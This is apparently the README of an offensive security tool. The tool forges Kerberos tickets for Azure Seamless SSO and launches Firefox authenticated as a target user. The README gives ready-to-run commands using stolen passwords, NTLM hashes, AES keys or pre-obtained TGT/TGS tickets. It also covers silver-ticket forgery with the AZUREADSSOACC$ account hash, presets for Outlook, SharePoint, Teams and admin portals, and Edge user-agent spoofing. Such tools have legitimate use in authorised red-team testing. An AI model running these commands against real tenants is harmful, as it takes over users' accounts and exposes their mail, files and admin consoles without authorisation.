dejisec/seamless-sso-browser

# seamless-sso-browser Forges Kerberos tickets for Azure Seamless SSO and drops you into a target user's browser session. Give it a hash, a password, a TGT -- whatever you've got. It gets the tickets sorted and launches Firefox already authenticated. ## Prerequisites - Linux with GSSAPI libs (Kali works out of the box) - Firefox (`sudo apt install firefox-esr`) - Seamless SSO enabled on the target tenant ## Usage Run directly: uvx git+https://github.com/dejisec/seamless-sso-browser -h Or clone and run: git clone https://github.com/dejisec/seamless-sso-browser.git cd seamless-sso-browser uv sync uv run seamless-sso-browser -h ## Examples ### You have the user's password or hash Talks to the DC to get a TGT, then requests service tickets for both SSO SPNs. seamless-sso-browser \ --domain domain.local \ --dc-ip 10.0.0.1 \ --user jsmith \ --password 'P@ssw0rd' Also works with `--user-password-hash ` or `--user-aes-key `. ### You have a TGT Maybe from Rubeus, maybe from a ccache on disk. Pass it in and the tool requests the SSO service tickets from the DC. seamless-sso-browser \ --domain domain.local \ --dc-ip 10.0.0.1 \ --tgt /path/to/tgt.ccache Accepts ccache, kirbi, or base64. ### You have a TGS Already got the service ticket? No DC needed. seamless-sso-browser \ --domain domain.local \ --tgs /path/to/tgs.kirbi Accepts ccache, kirbi, or base64. ### You have a ccache file Skip everything, just point at it: seamless-sso-browser \ --domain domain.local \ --ccache /path/to/combined.ccache ### Targeting something other than Outlook Default opens Outlook. Use `--target` to pick a different app: seamless-sso-browser \ --domain domain.local \ --ccache /path/to/combined.ccache \ --target sharepoint --tenant contoso Presets: `outlook` (default), `sharepoint` (needs `--tenant`), `teams`, `onedrive`, `admin`, `entra`, `azure`. You can also pass a raw URL: `--target https://custom-app.contoso.com`. ### User-agent The tool always spoofs Edge on Windows 11 by default, override with `--useragent "..."` if needed. ## All flags ### Authentication (pick one) | Flag | Description | |------|------------| | `--adssoacc-ntlm` | AZUREADSSOACC$ NTLM hash (silver ticket, no DC) | | `--adssoacc-aes` | AZUREADSSOACC$ AES key (silver ticket, no DC) | | `--password` | User's password (needs DC) | | `--user-password-hash` | User's NTLM hash, `[LMHASH:]NTHASH` (needs DC) | | `--user-aes-key` | User's AES key (needs DC) | | `--tgt` | Pre-obtained TGT, file or base64 (needs DC) | | `--tgs` | Pre-obtained TGS, file or base64 (no DC) | | `--ccache` | Pre-forged ccache file (skips everything) | ### Identity and domain | Flag | Description | |------|------------| | `--domain` | AD domain (always required) | | `--user` | Target sAMAccountName | | `--user-sid` | Full user SID (required for silver ticket forgery) | | `--upn` | UPN for display only | | `--dc-ip` | Domain controller address | ### Target and browser | Flag | Description | |------|------------| | `--target` | App preset or URL (default: `outlook`) | | `--tenant` | M365 tenant name (for `--target sharepoint`) | | `--useragent` | Custom user-agent (default: Edge on Windows 11) | | `--firefox-path` | Path to Firefox binary | | `--no-cleanup` | Keep temp files after exit | | `--verbose` | Print ccache path, krb5.conf, and the Firefox command | ## Troubleshooting Run with `--verbose --no-cleanup` first. That prints the ccache path, krb5.conf contents, and the exact Firefox command so you can poke at things manually. If SPNEGO negotiation isn't happening, set these and relaunch Firefox from the same shell: export NSPR_LOG_MODULES=negotiateauth:5 export NSPR_LOG_FILE=/tmp/firefox_spnego.log export KRB5_TRACE=/dev/stderr Usual suspects: clock skew over 5 minutes, Firefox not picking up the ccache (check `KRB5CCNAME`), or Conditional Access blocking the session even though the tickets are valid. ## Acknowledgments Inspired by [SeamlessPass](https://github.com/Malcrove/SeamlessPass) by Malcrove, which does the Seamless SSO flow as a CLI tool and gives you OAuth tokens. This project takes the same idea but wires it into a browser session instead, so you land directly in Outlook, SharePoint, or whatever else the target has access to.